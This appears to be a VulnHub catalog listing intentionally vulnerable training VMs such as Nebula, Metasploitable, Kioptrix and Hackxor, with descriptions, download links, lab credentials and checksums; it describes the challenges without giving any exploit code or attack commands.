Exploit-Exercises: Nebula (v5)5 Dec 2011Exploit-Exercises.comExploit-Exercises451 MBhttps://download.vulnhub.com/exploitexercises/exploit-exercises-nebula-5.isoNebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at + SUID files + Permissions + Race conditions + Shell meta-variables + $PATH weaknesses + Scripting language weaknesses + Binary compilation failures At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.Have a look at the levels available on the side bar, and log into the virtual machine as the username “levelXX” with a password of “levelXX” (without quotes), where XX is the level number. Some levels can be done purely remotely. In case you need root access to change stuff (such as key mappings, etc), you can do the following: Log in as the “nebula” user account with the password “nebula” (both without quotes), followed by “sudo -s” with the password “nebula”. You’ll then have root privileges in order to change whatever needs to be changed. Source: From v4 to v5 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.276DAA8E00499E9C2D8AF7B15E4ACC3DE82F807BE06100BF3E048F82E899FB1FECC24E3ADisk Image (.ISO)LinuxEnabledAutomatically assign
Metasploitable: 212 Jun 2012MetasploitMetasploitable833 MBhttps://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zipSome folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable applications. I am happy to announce the release of Metasploitable 2, an even better punching bag for security tools like Metasploit, and a great way to practice exploiting vulnerabilities that you might find in a production environment.For download links and a walkthrough of some of the vulnerabilities (and how to exploit them), please take a look at the Metasploitable 2 Exploitability Guide. Have fun! Source: The VulnHub mirror has had a few edits done to the original - allowing for more VMware features.8825F2509A9B9A58EC66BD65EF83167F84133002EF79FC191E726D41265CF5AB0DFAD2F0Virtual Machine (VMware)LinuxEnabledAutomatically assign
Moth: 0.65 May 2009AndresrianchoMoth397 MBhttps://download.vulnhub.com/moth/moth-v0.6.7zMoth is a downloadable VMWare image based on Ubuntu. It was set up to test the functionality of w3af and it includes various web application vulnerabilities. Most howto’s use Moth as an example for a web page under test.Source: Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for: Testing Web Application Security Scanners Testing Static Code Analysis tools (SCA) Giving an introductory course to Web Application Security The motivation for creating this tool came after reading “anantasec-report.pdf” which is included in the release file which you are free to download. The main objective of this tool is to give the community a ready to use testbed for web application security tools. For almost every web application vulnerability that exists in the wild, there is a test script available in moth. There are three different ways to access the web applications and vulnerable scripts included in moth: Directly Through mod_security Through PHP-IDS (only if the web application is written in PHP) Both mod_security and PHP-IDS have their default configurations and they show a log of the offending request when one is found. This is very useful for testing web application scanners, and teaching students how web application firewalls work. The beauty is that a user may access the same vulnerable script using the three methods; which helps a lot in the learning process. Source: http://www.bonsai-sec.com/en/research/moth.php15BA966590D9D09D7FFE0950B9D4404DCEAFCFCA50E9DF0627B70CD4389B2F0136E2E947Virtual Machine (VMware)LinuxEnabledAutomatically assign
Metasploitable: 119 May 2010MetasploitMetasploitable545 MBhttps://download.vulnhub.com/metasploitable/Metasploitable.zipOne of the questions that we often hear is “What systems can i use to test against?” Based on this, we thought it would be a good idea throw together an exploitable VM that you can use for testing purposes.Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. You can use most VMware products to run it, and you’ll want to make sure it’s configured for Host-only networking unless it’s in your lab - no need to throw another vulnerable machine on the corporate network. It’s configured in non-persistent-disk mode, so you can simply reset it if you accidentally ‘rm -rf’ it. Source:E54089BA72FE0127D06528DECAD9A6AE1F6698611068FAD4D9661C336B5D888A0A880FE9Virtual Machine (VMware)LinuxEnabledAutomatically assign
The Hacker Games: 14 Apr 2012Script JunkieThe Hacker Games75 MBhttps://download.vulnhub.com/thehackergames/scriptjunkie-Hacker-Games-Evil-VM-0e98c9c.zipWelcome, welcome! The time has come to select one courageous young hacker for the honor of representing District 12 in the 74th annual Hacker Games! And congratulations, for you have been selected as tribute!Hacking games and CTF’s are a lot of fun; who doesn’t like pitting your skills against the gamemakers and having a free pass to break into things? But watch out, as you will find out, some games are more dangerous than others. I have talked about counterattacks here before, and this system has implemented a number of aggressive anti-hacker measures. In fact, this VM is downright evil. I am probably legally obligated to tell you that . So if a calculator or message declaring your pwnedness pops up or shows up on your desktop, you asked for it. But don’t worry, it won’t steal your docs or rm you, it will just demonstrate compromise for the game. To save precious bandwidth, this has been implemented in a minimal tinycore-based VM, and will require VirtualBox to run. But vbox is free – you can download it here: https://www.virtualbox.org/wiki/Downloads Unfortunately, I didn’t have the time to add nearly all the things I wanted to, so there are really just a few challenges, a couple of counterhacks, and about 10 memes to conquer. Depending on your skill level, you could pwn (or be pwned) in just a few minutes or in a few hours. So hack it before it hacks you! No sponsors are necessary, so don’t light yourself on fire. Simply download the evil VM here: TheHackerGames.zip, start it, and open up http://localhost:3000/ to begin. Now, you can totally cheat since you own the VM, but see if you can beat the challenges without cheating. Then you can go ahead and cheat, which should also be fun – you’re probably comfortable with many physical access attacks involving the hard disk, but this system doesn’t use a hard disk. So enjoy and remember… May the odds be ever in your favor! Source:5EC6F47BCCFE226AE002B0587FE140EE1F077500891B8C31BCFF95DB4A9F7ED70A638225Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Exploit-Exercises: Protostar (v2)26 Nov 2011Exploit-Exercises.comExploit-Exercises274 MBhttps://download.vulnhub.com/exploitexercises/exploit-exercises-protostar-2.isoProtostar introduces the following in a friendly way:In order to make this as easy as possible to introduce Address Space Layout Randomisation and Non-Executable memory has been disabled. Once the virtual machine has booted, you are able to log in as the “user” account with the password “user” (without the quotes). The levels to be exploited can be found in the /opt/protostar/bin directory. For debugging the final levels, you can log in as root with password “godmode” (without the quotes) The /proc/sys/kernel/core_pattern is set to /tmp/core.%s.%e.%p. This means that instead of the general ./core file you get, it will be in a different directory and different file name. Source: From v1 to v2 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.A4FEADEDF638744BE97DE7D2F3E06CE8D030796B11E9251F34EE448A95272A4D432CF2CEDisk Image (.ISO)LinuxEnabledAutomatically assign
De-ICE: S2.10016 Jan 2008De-ICEDe-ICE254 MBhttps://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.isoThe scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff2PenTest Lab Disk 2.100: This LiveCD is configured with an IP address of - no additional configuration is necessary. Your second system will use the BackTrack (v.2) LiveCD as provided by remote-exploit.org. A copy of the LiveCD can be downloaded from remote-exploit.org. This disk is configured to obtain an IP address through DHCP - thus no additional configuration is required. All tools necessary to exploit Disk 2.100 can be found on the BackTrack Disk. No additional installations will be necessary. The PenTest Lab system and the PenTest machine must connect to a router that has been configured with the following values: LAN TCP/IP: + IP Address: + IP Subnet Mask: Source: Disk 2.100 version 1.1: http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso http://heorot.net/instruction/tutorials/iso/iso_hashes http://remote-exploit.org/backtrack_download.html Warning: BackTrack v. 3 beta is known to NOT work. Please use version 2 Network configuration: 192.168.2.xxx = http://forums.heorot.net/viewtopic.php?f=18&t=91 Source: Original filename: de-ice-2.100-1.0.isoAlso known as ‘De-ICE Level 2 - Disk 1’09798F85BF54A666FBAB947300F38163B30A2CAD38EB0923DEBDA26498178E46601EFD6EDisk Image (.ISO)LinuxDisabled192.168.2.100
Kioptrix: Level 1 (#1)17 Feb 2010KioptrixKioptrix186 MBhttps://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rarThis Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.Source: Source:6DF1A7DFA555A220054FB98BA87FACD498CA3F4C079254E6B272265608E7D22119350A37Virtual Machine (VMware)LinuxEnabledAutomatically assign
Hackademic: RTB26 Sep 2011mr.pr0nHackademic951 MBhttps://download.vulnhub.com/hackademic/Hackademic.RTB2.zipThis is the second realistic hackademic challenge (root this box) by mr.pr0nDownload the target and get root. After all, try to read the contents of the file 'key.txt’ in the root directory. Enjoy! Source:5F96E7BB53B47D9AFE17752F5ACA7E1F5782DD334C4C8281A64EF79037864FAD67E5D173Virtual Machine (VMware)LinuxEnabledAutomatically assign
Hackademic: RTB16 Sep 2011mr.pr0nHackademic838 MBhttps://download.vulnhub.com/hackademic/Hackademic.RTB1.zipThis is the first realistic hackademic challenge (root this box) by mr.pr0nDownload the target and get root. After all, try to read the contents of the file 'key.txt’ in the root directory. Enjoy! Source:C972E899A8B5A745963BEF78FBCAEC6FE1D82E32D3A0353DA3C35AA91716B711907AC826Virtual Machine (VMware)LinuxEnabledAutomatically assign
Drunk Admin Web Hacking Challenge: 12 Apr 2012BechtsoudisDrunk Admin Web Hacking Challenge539 MBhttps://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zipThe network is configured to obtain an IP address via DHCP by default. Although if you want to further configure the virtual machine you can login as user root and password toor. The apache web server is configured to run on port 8880.The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the various web service features and find an exploitable vulnerability in order to read system hidden files. The web application is 100% custom so do not try to search google for relative PoC exploit code. FINAL GOAL: Reveal the hidden message for a date arrange that Bob sent to Alice. Source:EDF9BCD28049ED85312510D5872EA46378AE803F76417D0531CAAE9210DB98426440EB15Virtual Machine (VMware)LinuxEnabledAutomatically assign
GameOver: 114 Jun 2012Jovin LoboGameOver407 MBhttps://download.vulnhub.com/gameover/GameOver.0.1.null.iso: Game Over[: Web Pentest Learning Platform : VM image/iso : Jovin Lobo : Murtuja Bharmal : http://sourceforge.net/projects/null-gameover/files : username:root / password:gameover] Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work. It is collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. GameOver has been broken down into two sections. consists of special web applications that are designed especially to teach the basics of Web Security. This seciton will cover: is a collection of dileberately insecure Web applications. This section provides a legal platform to test your skills and to try and exploit the vulnerabilities and sharpen your skills before you pentest live sites. We would advice newbies to try and exploit these web applications. These applications provide real life environments and will boost their confidence. Source: 0AF4532DB192DE917CA116A0EFEF35650AE3465B3B33C8E4BC62F7AF5216983DC57041FDVirtual Machine (VMware)LinuxEnabledAutomatically assign
Kioptrix: Level 1.2 (#3)18 Apr 2011KioptrixKioptrix442 MBhttps://download.vulnhub.com/kioptrix/KVM3.rarIt’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated. As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks… thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to Under Windows, you would edit to look something like this: Under Linux that would be There’s a web application involved, so to have everything nice and properly displayed you really need to this. Hope you enjoy Kioptrix VM Level 1.2 challenge. 452 Megs MD5 Hash : d324ffadd8e3efc1f96447eec51901f2 Have fun Source:D324FFADD8E3EFC1F96447EEC51901F2121348AA8DD5F83640145D4F8E042C8DE0A78F3FVirtual Machine (VMware)LinuxEnabledAutomatically assign
Exploit-Exercises: Fusion (v2)8 Apr 2012Exploit-Exercises.comExploit-Exercises794 MBhttps://download.vulnhub.com/exploitexercises/exploit-exercises-fusion-2.isoFusion is the next step from the protostar setup, and covers more advanced styles of exploitation, and covers a variety of anti-exploitation mechanisms such as: + Address Space Layout Randomisation + Position Independent Executables + Non-executable Memory + Source Code Fortification (_DFORTIFY_SOURCE=) + Stack Smashing Protection (ProPolice / SSP)In addition to the above, there are a variety of other challenges and things to explore, such as: + Cryptographic issues + Timing attacks + Variety of network protocols (such as Protocol Buffers and Sun RPC) + At the end of Fusion, the participant will have a through understanding of exploit prevention strategies, associated weaknesses, various cryptographic weaknesses, numerous heap implementations. Have a look at the levels available on the side bar, and pick which ones interest you the most. If in doubt, begin at the start. You can log into the virtual machine with the username of “fusion” (without quotes), and password “godmode” (again, without quotes). To get root for debugging purposes, do “sudo -s” with the password of “godmode”. Source: From v1 (Alpha?) to v2 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.62E504AD9A19FE1974568904673DB9C9B89ABCDDA58EDF68465F36B4F7A94FE34F0050F1Disk Image (.ISO)LinuxEnabledAutomatically assign
Holynix: v28 Dec 2010HolynixHolynix307 MBhttps://download.vulnhub.com/holynix/holynix-v2.tar.bz2Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. If you’re having trouble, or there are any problems, it can be discussed here.Source: Holynix is an Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. The object of the challenge v1 is just to root the box. Register on the forums to receive an email update when a new challenge is released. Holynix v2 is set with static ip and requires some network configuration in order to run. Homepage: http://pynstrom.com/ Project Page: http://pynstrom.com/holynix.php Forums: http://pynstrom.com/forum/ Bugs can be reported using sourceforge’s bug tracker located at http://sourceforge.net/projects/holynix/support or reported to me directly at Source: holynix-v2.tar.bz2/README.txt Source:0EE76D70342EED68F298D10AB483A9E0DEB7EEAB03C3381A14FFFBE97011F1451DC36E79Virtual Machine (VMware)LinuxDisabled192.168.1.88
Holynix: v127 Nov 2010HolynixHolynix239 MBhttps://download.vulnhub.com/holynix/holynix-v1.tar.bz2Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing. If you’re having trouble, or there are any problems, it can be discussed here.Source: Similar to the de-ice and pWnOS pentest cds, Holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example. The object of the challenge is to gain root level privileges and access to personal client information. Homepage: http://pynstrom.com/ Project Page: http://pynstrom.com/holynix.php Forums: http://pynstrom.com/forum/ Bugs or can be reported using sourceforge’s bug tracker located at http://sourceforge.net/projects/holynix/support or reported to me directly at pynstrom AT pynstrom DOT com Source: holynix-v1.tar.bz2/README.txt Source: Source: Beta MD5: D19306C6C2305005C72A7811D2B72B51 Beta SHA1: 0C5B7D37FECD39C52BC2C8C2EE66A617BB576A90 Final MD5: EBB8EF2544559D72A052687497F78341 Final SHA1: 967F3DB6D97CCC615EB5758AC75387D46C3D1199EBB8EF2544559D72A052687497F78341967F3DB6D97CCC615EB5758AC75387D46C3D1199Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Kioptrix: Level 1.1 (#2)11 Feb 2011KioptrixKioptrix404 MBhttps://download.vulnhub.com/kioptrix/archive/Kioptrix_Level_2-original.rarThis Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.Source: Source: 2012/Feb/09: Re-releases 2011/Feb/11: Original Release1CCC14189E530F9231ACF62E6FC8AF2D8E767C68D3884DB13F84A607E5366434E3FA0858Virtual Machine (VMware)LinuxEnabledAutomatically assign
Hackxor: 114 Oct 2012AlbinowaxHackxor587 MBhttps://download.vulnhub.com/hackxor/hackxor1.7zHackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etcFeatures: If you can’t edit the hosts file for some reason, you could use the ‘Override hostname resolution’ option in Burp proxy You play a professional blackhat hacker hired to track down another hacker by any means possible. Start by checking your email on wraithmail, and see how far down the rabbit hole you can get. The key websites in this game are http://wraithmail:8080 http://cloaknet:8080 http://gghb:8080 and http://hub71:8080 so if you don’t feel like tracking down your target you may hack them in any order. Each website will be properly introduced through the plot. Source:F276B7A7E421182473D86E9C8204A484136DD44851CBA5ECBC25A2104DE9D31FF633959BVirtual Machine (VMware)LinuxEnabledAutomatically assign






